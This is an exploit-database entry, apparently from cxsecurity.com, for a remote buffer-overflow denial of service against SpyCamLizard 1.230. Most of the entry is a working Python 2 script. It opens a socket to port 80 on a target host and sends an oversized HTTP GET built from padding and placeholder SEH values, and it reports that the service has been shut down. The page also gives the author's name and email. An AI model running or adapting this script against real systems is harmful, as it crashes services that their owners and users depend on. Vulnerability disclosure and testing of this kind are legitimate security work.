SpyCamLizard 1.230 - Denial of Service

2017.03.23
Credit: ScrR1pTK1dd13
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

import socket import sys author = ''' ############################################## # Created: ScrR1pTK1dd13 # # Name: Greg Priest # # Mail: ScR1pTK1dd13.slammer@gmail.com # ############################################## # Exploit Title: SpyCamLizard SC liz v1.230 Remote Buffer Overflow ZeroDay # Date: 2017.03.22 # Exploit Author: Greg Priest # Version: SpyCamLizard v1.230 # Tested on: Windows7 x64 HUN/ENG Enterprise ''' print "SpyCamLizard DoS Exploit running!" host = "192.168.56.1" port = 80 overflow = "A" * 1189 nextSEH = "BBBB" SEH = "CCCC" overflow2= "D" * 3803 crash = overflow+nextSEH+SEH+overflow2 httpsocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM) httpsocket.connect((host,port)) httpsocket.send("GET " + crash + " HTTP/1.0\r\n\r\n") httpsocket.close() print "SpyCamLizard shutted down!"


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top